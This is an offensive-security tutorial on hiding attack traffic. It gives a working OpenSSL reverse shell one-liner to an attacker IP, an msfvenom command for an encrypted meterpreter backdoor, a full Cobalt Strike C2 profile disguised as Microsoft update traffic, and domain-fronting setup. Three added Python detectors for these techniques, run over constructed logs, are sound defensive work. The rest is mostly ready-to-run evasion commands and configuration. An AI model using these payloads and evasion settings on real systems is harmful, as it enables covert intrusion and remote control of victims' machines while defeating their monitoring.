OpenSSL encrypted reverse shell
OpenSSL is an open source software library. Applications use it to communicate securely, prevent eavesdropping and, at the same time, confirm the identity of the other end of the connection. It is widely used on web servers on the Internet.
Generate a self-signed certificate with OpenSSL on Kali:
openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365 -nodes
Listen on a port on Kali:
openssl s_server -quiet -key key.pem -cert cert.pem -port 8080
Execute the reverse shell command on the target:
mkfifo /tmp/s; /bin/sh -i < /tmp/s 2>&1 | openssl s_client -quiet -connect 10.10.10.129:8080 > /tmp/s; rm /tmp/s
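From the defender's side, the chain above leaves a recognisable process-tree footprint. The following is an added example (not code from the original post) of a heuristic detector run over constructed process-creation events; the telemetry field names pid, ppid and cmdline are assumptions.

```python
"""Added example (not from the original post): a heuristic detector for the
mkfifo / openssl s_client reverse-shell pattern above, run over constructed
process-creation events. The field names pid, ppid and cmdline are assumed."""
import re
import shlex

# Constructed telemetry: the reverse-shell chain (pids 100-103) plus a
# benign certificate check (pid 200) that must not alert.
EVENTS = [
    {"pid": 100, "ppid": 1, "cmdline": "/bin/sh -c 'mkfifo /tmp/s; /bin/sh -i < /tmp/s "
                                       "2>&1 | openssl s_client -quiet -connect 10.10.10.129:8080 > /tmp/s; rm /tmp/s'"},
    {"pid": 101, "ppid": 100, "cmdline": "mkfifo /tmp/s"},
    {"pid": 102, "ppid": 100, "cmdline": "/bin/sh -i"},
    {"pid": 103, "ppid": 100, "cmdline": "openssl s_client -quiet -connect 10.10.10.129:8080"},
    {"pid": 200, "ppid": 300, "cmdline": "openssl s_client -connect example.com:443 -showcerts"},
]
IP_PORT = re.compile(r"^\d{1,3}(\.\d{1,3}){3}:\d+$")

def connect_target(argv):
    """Return the value given to -connect, or None when absent."""
    for i, a in enumerate(argv[:-1]):
        if a == "-connect":
            return argv[i + 1]
    return None

def find_reverse_shells(events):
    """Score every openssl s_client process on four signals: the peer is a raw
    IP:port, -quiet is set, an interactive shell (sh -i) and a mkfifo call run
    under the same parent. Three or more signals together are reported."""
    hits = []
    for e in events:
        argv = shlex.split(e["cmdline"])
        if len(argv) < 2 or not argv[0].endswith("openssl") or argv[1] != "s_client":
            continue
        sibs = [shlex.split(s["cmdline"]) for s in events
                if s["ppid"] == e["ppid"] and s is not e]
        target = connect_target(argv)
        signals = {
            "raw_ip_peer": bool(target and IP_PORT.match(target)),
            "quiet": "-quiet" in argv,
            "shell_sibling": any(len(a) > 1 and a[0].endswith("sh") and a[1] == "-i" for a in sibs),
            "fifo_sibling": any(a[:1] == ["mkfifo"] for a in sibs),
        }
        if sum(signals.values()) >= 3:
            hits.append({"pid": e["pid"], "target": target, "signals": signals})
    return hits
```

Because the session is TLS-encrypted, the wire gives a network sensor little to go on; the process tree on the host is the more reliable place to catch it.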
Encrypting msf traffic to avoid detection
Create an SSL/TLS certificate with OpenSSL:
openssl req -new -newkey rsa:4096 -days 365 -nodes -x509 \
-subj "/C=UK/ST=London/L=London/O=Development/CN=www.google.com" \
-keyout www.google.com.key \
-out www.google.com.crt && \
cat www.google.com.key www.google.com.crt>www.google.com.pem && \
rm -f www.google.com.key www.google.com.crt
Generate the backdoor:
msfvenom -p windows/meterpreter/reverse_winhttps LHOST=192.168.11.132 LPORT=443 PayloadUUIDTracking=true HandlerSSLCert=www.google.com.pem StagerVerifySSLCert=true PayloadUUIDName=ParanoidStagedPSH -f psh-cmd -o pentestlab.bat
Copy the generated file to the target machine.
Use msf to listen for the connection.
From the moment the payload is executed on the target host, an encrypted meterpreter session is opened, which prevents the host intrusion prevention system from inspecting the packets and disconnecting the session.
The captured packets are encrypted.
Cobalt Strike: generate a certificate and modify the C2 profile to encrypt and obfuscate traffic
Generate a free SSL certificate
By default Cobalt Strike runs with the cobaltstrike.store certificate, and that default certificate is detected. The point of generating a new certificate is to use our own certificate instead. The following command generates it.
keytool -genkey -alias moonsec -keyalg RSA -validity 36500 -keystore moonsec.store
Remember the two strings moonsec (the alias) and moonsec.store (the keystore): you will need them when modifying the profile, along with the region information you fill in. After filling in this information you will also use it in the profile.
After running the above command, you will be prompted for a password; enter moonsec123. You will then be prompted for the region information; follow the prompts and fill it in step by step.
Create and modify the C2 profile file
set sample_name "xbb POS Malware";
set sleeptime "5000"; # 5 s between callbacks
set jitter "10"; # throw in a 10% jitter
set useragent "Mozilla/5.0 (Windows NT 6.1; rv:24.0) Gecko/20100101 Firefox/24.0";
# certificate settings
https-certificate {
    set CN "US";
    set O "MicrosoftUpdates";
    set C "en";
    set L "US";
    set OU "MicrosoftUpdates";
    set ST "US";
    set validity "365";
}
# code-signer settings (keystore, password and alias from the keytool step)
code-signer {
    set keystore "moonsec.store";
    set password "moonsec123";
    set alias "moonsec";
}
# IP address the DNS beacon resolves to when it is idle
set dns_idle "8.8.4.4";
# forced sleep time before each individual DNS request
set dns_sleep "0";
# maximum hostname length when uploading data over DNS [0-255]
set maxdns "235";
http-post {
    set uri "/windebug/updcheck.php /aircanada/dark.php /aero2/fly.php /windowsxp/updcheck.php /hello/flash.php";
    client {
        header "Accept" "text/plain";
        header "Accept-Language" "en-us";
        header "Accept-Encoding" "text/plain";
        header "Content-Type" "application/x-www-form-urlencoded";
        id {
            netbios;
            parameter "id";
        }
        output {
            base64;
            prepend "&op=1&id=vxeykS&ui=Josh @ PC&wv=11&gr=backoff&bv=1.55&data=";
            print;
        }
    }
    server {
        output {
            print;
        }
    }
}
http-get {
    set uri "/updates";
    client {
        metadata {
            netbiosu;
            prepend "user=";
            header "Cookie";
        }
    }
    server {
        header "Content-Type" "text/plain";
        output {
            base64;
            print;
        }
    }
}
Test the certificate
Run the teamserver:
nohup ./teamserver 192.168.11.132 admin moonsec.profile &
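Every fixed string in the profile above is also a detection opportunity: the pinned user agent, the fixed URI list, the "user=" cookie carrying NetBIOS-encoded metadata, and the constant prefix of the POST body. The following is an added example (not code from the original post) of detection logic run over constructed HTTP log records in JSON-lines form; the record field names are an assumption.

```python
"""Added example (not part of the original post): detection logic for the
beacon traffic the profile above would produce, run over constructed HTTP log
records in JSON lines form (the field names are an assumption)."""
import json
import re

UA = "Mozilla/5.0 (Windows NT 6.1; rv:24.0) Gecko/20100101 Firefox/24.0"
POST_URIS = {"/windebug/updcheck.php", "/aircanada/dark.php", "/aero2/fly.php",
             "/windowsxp/updcheck.php", "/hello/flash.php"}
POST_PREFIX = "&op=1&id=vxeykS&ui=Josh @ PC&wv=11&gr=backoff&bv=1.55&data="
NETBIOS_U = re.compile(r"^(?:[A-P]{2})+$")  # netbiosu: one byte -> two chars A-P

def netbiosu_decode(s):
    """Undo the uppercase NetBIOS encoding the http-get block applies ('A' is 0)."""
    nib = [ord(c) - ord("A") for c in s]
    return bytes((nib[i] << 4) | nib[i + 1] for i in range(0, len(nib), 2))

def classify(record):
    """Return the profile indicators matched by one HTTP log record."""
    hits = []
    headers = {k.lower(): v for k, v in record.get("headers", {}).items()}
    if record.get("user_agent") == UA:
        hits.append("ua:firefox24")          # pinned, outdated user agent
    cookie = headers.get("cookie", "")
    if (record.get("method") == "GET" and record.get("uri") == "/updates"
            and cookie.startswith("user=") and NETBIOS_U.match(cookie[5:])):
        hits.append("get:netbios-cookie")    # metadata: netbiosu; prepend "user="
    if (record.get("method") == "POST" and record.get("uri") in POST_URIS
            and record.get("body", "").startswith(POST_PREFIX)):
        hits.append("post:backoff-prefix")   # output: prepend "&op=1&id=..."
    return hits

def scan(lines):
    """Index of each log line that matched, with its indicators."""
    return {i: h for i, line in enumerate(lines) if (h := classify(json.loads(line)))}

def netbiosu_encode(data):
    """Constructed-sample helper: the inverse of netbiosu_decode."""
    return "".join(chr(ord("A") + n) for b in data for n in (b >> 4, b & 15))

# Constructed sample log, not captured traffic.
LOG = [
    json.dumps({"method": "GET", "uri": "/updates", "user_agent": UA,
                "headers": {"Cookie": "user=" + netbiosu_encode(b"Hi")}}),
    json.dumps({"method": "POST", "uri": "/aero2/fly.php", "user_agent": UA,
                "headers": {"Content-Type": "application/x-www-form-urlencoded"},
                "body": POST_PREFIX + "aGVsbG8="}),
    json.dumps({"method": "GET", "uri": "/updates", "user_agent": "curl/8.0",
                "headers": {}}),
]
```

The decoded cookie is still the beacon's encrypted metadata, so the value of the decoder is the character-set signature it checks, not the content.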
Domain fronting: Cobalt Strike evades IDS audit
Domain fronting is an evasion technique built on HTTPS, also known as domain front-end technology. It is used to hide the traffic between Metasploit, Cobalt Strike and similar team servers and the hosts they control, so as to bypass inspection devices or firewalls to some extent. Large providers such as Amazon, Google and Akamai provide some services that support domain fronting.
How domain fronting works: traffic is forwarded to the real C2 server through a CDN node. The CDN node forwards the traffic according to the Host header of the request, so what the defenses see is the high reputation of the domain name we configure; for example, we can use a Microsoft subdomain, which effectively evades traffic monitoring such as DLP and proxies.
Cobalt Strike domain fronting configuration
Modify the C2 profile: choose a suitable profile from https://github.com/xx0hcd/Malleable-C2-Profiles and change the Host header to the domain name prepared for us.
Run the teamserver on Kali with the configuration file:
nohup ./teamserver 192.168.11.132 admin cdn.profile
nohup is added in front of the command so that it keeps running after the shell is closed; otherwise CS will not be able to connect if the shell is broken.
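The tell-tale of domain fronting is that the TLS SNI (the CDN's front domain) and the HTTP Host header inside the tunnel (the real C2 name) disagree. The following is an added example (not code from the original post) that joins Zeek-style ssl and http rows on the connection uid and reports such mismatches; it assumes an inspection point, such as a TLS-terminating proxy, that logs both values, and the tab-separated column layout is an assumption.

```python
"""Added example (not part of the original post): flag connections whose TLS
SNI and inner HTTP Host header disagree, which is what the domain fronting
above looks like to a proxy or inspection point that can see both. The
Zeek-style tab-separated columns used here are an assumption."""

def parse_tsv(text, fields):
    """Parse '#'-commented, tab-separated rows into dicts keyed by fields."""
    rows = []
    for line in text.strip().splitlines():
        if line.startswith("#"):
            continue
        rows.append(dict(zip(fields, line.split("\t"))))
    return rows

def norm(host):
    """Lower-case, drop a :port suffix and a trailing dot before comparing."""
    host = host.lower()
    if host.count(":") == 1:          # host:port, not an IPv6 literal
        host = host.rsplit(":", 1)[0]
    return host.rstrip(".")

def fronting_candidates(ssl_rows, http_rows):
    """Join ssl and http rows on the connection uid and report mismatches."""
    sni_by_uid = {r["uid"]: r["server_name"] for r in ssl_rows
                  if r["server_name"] != "-"}
    hits = []
    for r in http_rows:
        sni = sni_by_uid.get(r["uid"])
        if sni and r["host"] != "-" and norm(sni) != norm(r["host"]):
            hits.append((r["uid"], norm(sni), norm(r["host"])))
    return hits

# Constructed sample rows: C1 fronts a CDN name to reach another host,
# C2 is ordinary traffic (case and port differ only), C3 has no SNI.
SSL_LOG = """#fields\tuid\tserver_name
C1\tcdn.front.example.net
C2\tshop.example.com
C3\t-
"""
HTTP_LOG = """#fields\tuid\thost\turi
C1\treal-c2.example.org\t/updates
C2\tSHOP.example.com:443\t/cart
C3\tsomething.example\t/
"""

def run():
    """Apply the check to the constructed logs above."""
    return fronting_candidates(parse_tsv(SSL_LOG, ["uid", "server_name"]),
                               parse_tsv(HTTP_LOG, ["uid", "host", "uri"]))
```

Without a decrypting inspection point the Host header is not visible and this check cannot run; the remaining signal is then the destination CDN combined with beacon timing.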